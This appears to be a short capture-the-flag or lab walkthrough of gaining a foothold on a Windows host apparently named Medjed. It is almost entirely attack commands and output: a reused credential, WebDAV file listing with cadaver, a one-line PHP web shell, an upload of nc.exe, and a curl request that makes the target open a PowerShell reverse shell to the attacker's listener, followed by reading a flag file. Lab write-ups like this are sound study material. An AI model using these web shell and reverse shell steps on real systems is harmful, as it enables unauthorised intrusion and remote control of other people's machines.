Foothold
adot:Pwned123!
Inspiration with cadaver
❯ cadaver
dav:!> open http://192.168.160.127:8000/fs/88dbf60667052595/
dav:/fs/88dbf60667052595/> cd ..
Authentication required for Web File Server on server `192.168.160.127':
Username: adot
Password:
dav:/fs/> ls
Listing collection `/fs/': succeeded.
Coll: C 0 Dec 31 1969
Coll: D 0 Dec 31 1969
dav:/fs/> cd C
dav:/fs/C/> ls
Listing collection `/fs/C/': succeeded.
Coll: $Recycle.Bin 0 Nov 3 2020
Coll: $WinREAgent 0 Dec 2 2021
Coll: Documents and Settings 0 Oct 16 2020
Coll: FTP 0 Nov 3 2020
Coll: PerfLogs 0 Dec 7 2019
Coll: Program Files (x86) 0 Dec 2 2021
Coll: Program Files 0 Dec 2 2021
Coll: ProgramData 0 Dec 7 2021
Coll: RailsInstaller 0 Nov 3 2020
Coll: Recovery 0 Dec 2 2021
Coll: Ruby26-x64 0 Nov 3 2020
Coll: Sites 0 Nov 3 2020
Coll: System Volume Information 0 Oct 16 2020
Coll: Users 0 Dec 2 2021
Coll: Windows 0 Apr 8 2022
Coll: bd 0 Oct 8 07:29
Coll: xampp 0 Oct 16 2020
DumpStack.log.tmp 8192 Aug 2 15:29
output.txt 2696 Oct 8 07:16
pagefile.sys 738197504 Aug 2 15:29
swapfile.sys 268435456 Aug 2 15:29
dav:/fs/C/>
❯ echo test > test.txt
❯ echo "<?php echo shell_exec(\$_GET['cmd']); ?>" > cmd.php
dav:/fs/C/xampp/htdocs/> put nc.exe
Uploading nc.exe to `/fs/C/xampp/htdocs/nc.exe':
Progress: [=============================>] 100.0% of 59392 bytes succeeded.
❯ curl http://192.168.160.127:45332/cmd.php\?cmd\=nc.exe+192.168.45.239+8000+-e+powershell.exe
❯ nc -lnvp 8000
listening on [any] 8000 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.160.127] 50608
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\xampp\htdocs> whoami ; type C:\Users\Jerren\Desktop\local.txt ; ipconfig
whoami ; type C:\Users\Jerren\Desktop\local.txt ; ipconfig
medjed\jerren
e51dcad7ed48861988c2bd2337cdc9c3
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.160.127
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.160.254